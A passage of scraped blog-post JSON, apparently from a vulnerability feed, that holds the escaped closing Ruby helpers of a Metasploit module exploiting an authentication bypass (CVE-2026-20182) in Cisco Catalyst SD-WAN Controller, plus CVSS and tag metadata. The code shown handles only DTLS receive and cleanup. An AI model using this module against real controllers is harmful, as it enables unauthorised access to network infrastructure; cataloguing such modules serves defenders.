timeout: 10)\\n ready = ::IO.select([udp_sock], nil, nil, timeout)\\n return nil unless ready\\n\\n begin\\n dgram = udp_sock.recvfrom(65_536)[0]\\n rescue ::IO::WaitReadable\\n return nil\\n end\\n\\n @f_bio_write.call(rbio, dgram, dgram.bytesize)\\n\\n @f_err_clear_error.call\\n ret = @f_ssl_read.call(ssl, @recv_buf, RECV_BUF_SIZE)\\n if ret \\u003c= 0\\n err = @f_ssl_get_error.call(ssl, ret)\\n return nil if err == SSL_ERROR_WANT_READ\\n\\n vprint_status(\\”SSL_read error: #{err}\\”)\\n return nil\\n end\\n\\n @recv_buf.to_str(ret).b\\n end\\n\\n def cleanup_dtls(ssl, ctx, udp_sock)\\n if ssl\\n begin\\n @f_ssl_free.call(ssl)\\n rescue ::StandardError\\n nil\\n end\\n end\\n\\n if ctx\\n begin\\n @f_ssl_ctx_free.call(ctx)\\n rescue ::StandardError\\n nil\\n end\\n end\\n\\n begin\\n udp_sock\\u0026.close\\n rescue ::StandardError\\n nil\\n end\\n end\\nend\\n”,”sourceHref”:”https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/auxiliary\/admin\/networking\/cisco_sdwan_vhub_auth_bypass.rb”,”cvss”:{“score”:10,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:C\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/admin\/networking\/cisco_sdwan_vhub_auth_bypass\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-05-15T19:28:09″,”description”:”This module exploits an authentication bypass vulnerability CVE-2026-20182 in the Cisco Catalyst SD-WAN Controller. The vdaemon DTLS control-plane service performs no certificate or credential verification…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,36,12,169,13,7,11,5],"class_list":["post-54918","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-100","tag-exploit","tag-metasploit","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n